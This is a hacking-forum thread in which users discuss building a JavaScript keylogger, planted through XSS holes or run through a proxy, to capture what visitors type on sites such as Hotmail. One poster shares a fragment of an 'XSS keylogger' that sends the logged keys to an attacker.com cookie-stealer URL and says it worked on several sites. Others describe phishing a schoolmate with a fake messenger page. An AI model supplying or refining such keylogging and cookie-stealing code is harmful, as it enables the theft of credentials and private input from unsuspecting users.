Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

keylogger

0 0

I was wonderingif it was possable to put a keylogger on a page, for instance, I was going to create a page with a iframe of something of the likes and log anything that is typed there. eg. user types a-b-c-d wich gets stored to a .txt every letter, then they delete d-c it would store del-d, del-c or something along those lines.

if anyone understands this could you please help I guess the best language for this would be javascript!

0 1

you cant log keys via a webpage.

you can log post data etc, but you cant log keys in real time.

0 0

ok, thanks for confirming that, it was what I was trying to aviod:( oh well

thanks anyway! I MIGHT add this to my proxy

Banned
0 0

There MIGHT be a way. I found this code on hts awhile back. Its an xss keylogger, you just add in an xss hole. Maybe if you add it on your HTML on your site, you might be lucky.

0 0

Awsome thanks, I will see if I can get this to work with it!

Banned
0 0

OOps, hold on, I left some out, heres the WHOLE code.

onunload=window.location="http://www.attacker.com/cookiestealer.php?cookie="+key>```

0 1

ohhhh very interesting

Banned
0 0

Mr_Cheese wrote: ohhhh very interesting

yea, Ive got it to work on a few sites with XSS wholes. Very fun. Too bad I didnt code it :(

Bl4ckC4t

0 0

once I have the proxy/keylogger working I will put it in the code bank, might be a little while tho:(

0 0

you could do it in ajax :)

0 0

it's not a keylog site, I am going to incoperate it into a proxy, so if visitors visit like hotmail or HBH, whatever I can get everything they type… you understand! ;)

0 0

Rofl it works, i tried it on someone before. I read an article on this site, worked a treat. E-messenger layout, hosted on i love hbh. keep up the good work!. I said to a noob at school. 'this beats the system, you can go on msn, tell everyone!'

0 0

LOL, HAHAHA, nice I will try that once I have it all running and everything

0 0

willeH wrote: you could do it in ajax :)

I agree with willeH, ajax would be very much capable of doing such a thing.

0 0

Unfortunatly I havn't got a clue as to how I would acomplish that, but if someone would like to teach me (i am currently googeling) it would be kewl